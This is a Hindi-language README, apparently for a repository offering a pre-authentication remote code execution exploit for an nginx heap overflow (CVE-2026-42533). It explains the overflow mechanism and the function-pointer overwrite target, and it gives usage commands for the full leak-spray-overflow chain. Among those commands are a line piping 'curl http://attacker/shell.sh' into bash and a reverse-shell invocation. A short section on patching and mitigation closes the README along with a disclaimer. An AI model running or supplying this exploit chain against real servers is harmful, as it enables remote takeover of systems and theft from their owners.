
nginx हीप बफर ओवरफ्लो (CVE-2026-42533) के लिए एक्सप्लॉइट जो टू-पास कैप्चर क्लोबरिंग के माध्यम से प्री-ऑथ RCE प्रदान करता है। इसमें इंफो लीक, हीप स्प्रे और रिवर्स शेल मॉड्यूल शामिल हैं।
टू-पास कैप्चर क्लोबरिंग के माध्यम से प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन
सार्वजनिक PoC 2026-07-27 को जारी — प्रतीक्षा न करें, अभी पैच करें।
| CVE | CVE-2026-42533 |
| CVSS 4.0 | 9.2 (गंभीर) |
| प्रकार | हीप बफर ओवरफ्लो (CWE-122) |
| प्रभावित | nginx 0.9.6 – 1.30.3 (stable), 0.9.6 – 1.31.2 (mainline) |
| फिक्स | nginx 1.30.4 / 1.31.3, NGINX Plus R36 P7 / 37.0.3.1 |
| खुलासा | 2026-07-15 (F5 / NGINX) |
| PoC रिलीज़ | 2026-07-27 |
| शोधकर्ता | Stan Shaw (0xCyberstan) |
| प्लेटफ़ॉर्म | डायग्नोस्टिक | ओवरफ्लो | क्रैश | जानकारी लीक |
|---|---|---|---|---|
| Ubuntu 24.04 x86_64 | ✅ | ✅ | ✅ SIGABRT | ⚠️ आंशिक |
CVE-2026-42533, nginx के टू-पास स्ट्रिंग मूल्यांकन इंजन में एक गंभीर हीप बफर ओवरफ्लो है। जब कोई regex-आधारित map निर्देश क्रमांकित कैप्चर समूहों ($1, $2, आदि) के साथ इंटरैक्ट करता है, तो साझा r->captures संरचना LEN (माप) और VALUE (लेखन) पासों के बीच चुपचाप अधिलेखित हो जाती है। इससे आकार बेमेल उत्पन्न होता है:
एक साथ जुड़कर, ये दो प्रिमिटिव विश्वसनीय प्री-ऑथ RCE को सक्षम करते हैं, ASLR को पराजित करते हुए — Ubuntu 24.04 पर 10/10 विश्वसनीयता के साथ प्रदर्शित।
┌─────────────────────────────────────────────────────────────┐
│ LEN PASS (measure) │
│ $1 from location ~ ^/api/(...)$ = "abc" → measures 3 bytes│
│ $overflow_gadget = giant_header → measures 5000 bytes │
│ Buffer allocated: 5003 bytes │
│ │
│ [ $overflow_gadget triggers map regex → clobbers $1 ] │
│ $1 now = giant_header (5000 bytes) │
│ │
│ VALUE PASS (write) │
│ $1 writes 5000 bytes (LEN said 3!) → OVERFLOW! │
│ $overflow_gadget writes 5000 bytes │
│ Total written: 10000 bytes into 5003-byte buffer │
│ → 4997 bytes overflow into adjacent heap │
└─────────────────────────────────────────────────────────────┘
ओवरफ्लो आसन्न हीप संरचनाओं को दूषित करता है। प्राथमिक लक्ष्य ngx_pool_cleanup_t है:
struct ngx_pool_cleanup_s {
ngx_pool_cleanup_pt handler; // function pointer → overwrite for RIP control
void *data; // argument to handler
ngx_pool_cleanup_t *next; // next in chain
};
जब कनेक्शन पूल नष्ट किया जाता है, तो handler(data) को कॉल किया जाता है → मनमाना कोड निष्पादन।
CVE-2026-42533/
├── exploit/
│ ├── exploit.py # Full exploit chain (leak → spray → overflow → RCE)
│ ├── leak.py # Info leak module (heap/libc pointer leak)
│ ├── overflow.py # Heap overflow module (crash / RCE trigger)
│ ├── analyze.py # GDB analysis helper for offset determination
│ └── requirements.txt # Python dependencies
├── nginx/
│ └── nginx.conf # Vulnerable nginx configuration
├── Dockerfile # Docker build for test environment (Ubuntu 24.04)
├── docker-compose.yml # Docker Compose for easy deployment
└── README.md
requests के साथ Python 3.8+# Diagnostic mode — shows two-pass mismatch (safe, no crash)
python3 exploit/overflow.py <target> --diagnose
आउटपुट:
header= 10: LEN= 13 actual= 13 internal_overflow= 7 ✓
header= 100: LEN= 103 actual= 103 internal_overflow= 97 ✓
header= 1000: LEN= 1003 actual= 1003 internal_overflow= 997 ✓
python3 exploit/overflow.py <target> --crash
Ubuntu 24.04 पर परिणाम:
worker process 12282 exited on signal 6 (core dumped)
free(): invalid next size (normal)
# Ubuntu 24.04 (confirmed working)
ssh root@<your-server>
apt-get install -y build-essential libpcre2-dev libssl-dev zlib1g-dev
wget https://nginx.org/download/nginx-1.27.4.tar.gz
tar xzf nginx-1.27.4.tar.gz && cd nginx-1.27.4
./configure --prefix=/usr/local/nginx --with-cc-opt='-g -O0'
make -j$(nproc) && make install
# Copy vulnerable config
cp nginx/nginx.conf /usr/local/nginx/conf/nginx.conf
/usr/local/nginx/sbin/nginx
# Run exploit from your machine
python3 exploit/overflow.py <server-ip> --diagnose
docker compose up -d --build
python3 exploit/overflow.py localhost --port 8080 --diagnose
python3 exploit/exploit.py <target> [options]
# Examples:
python3 exploit/exploit.py 192.168.1.100 # full auto
python3 exploit/exploit.py 192.168.1.100 --leak-only # recon only
python3 exploit/exploit.py 192.168.1.100 --crash # verify vuln
python3 exploit/exploit.py 192.168.1.100 --cmd "id > /tmp/pwned"
# Manual mode (if you have pre-leaked addresses)
python3 exploit/exploit.py 192.168.1.100 \
--libc 0x7f1234000000 \
--heap 0x5a1234000000 \
--cmd "curl http://attacker/shell.sh | bash"
# Reverse shell
python3 exploit/exploit.py 192.168.1.100 \
--reverse-shell --lhost 10.0.0.1 --lport 4444
python3 exploit/leak.py <target> [options]
# Quiet mode (just output addresses)
python3 exploit/leak.py 192.168.1.100 -q
# LIBC:0x7f1234567890
# HEAP:0x5a1234567890
python3 exploit/overflow.py <target> --crash # crash worker (PoC)
python3 exploit/overflow.py <target> --spray # heap spray only
एक्सप्लॉइट के लिए nginx कॉन्फ़िगरेशन में इस विशिष्ट पैटर्न की आवश्यकता होती है:
# 1. A regex-based map (clobbers capture state)
map $http_x_overflow $overflow_gadget {
"~^(.+)$" $1; # regex match overwrites $1
default "";
}
# 2. A regex location (creates captures)
server {
location ~ ^/api/(...)$ { # creates $1, $2, ...
# 3. Both capture AND map variable in same directive
return 200 "$1$overflow_gadget"; # ← two-pass sink
}
}
सार्वजनिक स्कैनर का उपयोग करके कमजोर कॉन्फ़िग्स का पता लगाएं:
Worker PID: 12282
[Phase 1] Diagnostic:
header=100: LEN=103, response=103 ✓
header=1000: LEN=1003, response=1003 ✓ (997 byte internal overflow!)
[Phase 2] Heap Corruption:
8000-byte header → VALUE writes 16000 bytes into 8003-byte buffer
→ 7997 bytes overflow past buffer boundary
Worker PID: 12331 (NEW — old worker DEAD!)
Error log:
free(): invalid next size (normal)
worker process 12282 exited on signal 6 (core dumped)
# Upgrade to patched versions:
# nginx 1.30.4+ (stable) / 1.31.3+ (mainline)
# NGINX Plus R36 P7 / 37.0.3.1
map निर्देशों में क्रमांकित कैप्चर को नामित कैप्चर से बदलें:
# VULNERABLE
map $http_foo $bar {
"~^(.+)$" $1; # numbered capture → clobbers shared state
}
# MITIGATED
map $http_foo $bar {
"~^(?<val>.+)$" $val; # named capture → isolated
}
nginx -v (≥ 1.30.4 या ≥ 1.31.3 होना चाहिए)यह PoC सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए जारी किया गया है। इसका उपयोग केवल उन प्रणालियों के विरुद्ध करें जिनके आप स्वामी हैं या जिनके परीक्षण हेतु आपके पास स्पष्ट प्राधिकरण है। भेद्यता को पैच किया जा चुका है — यदि आपने पहले से नहीं किया है, तो तुरंत अपग्रेड करें।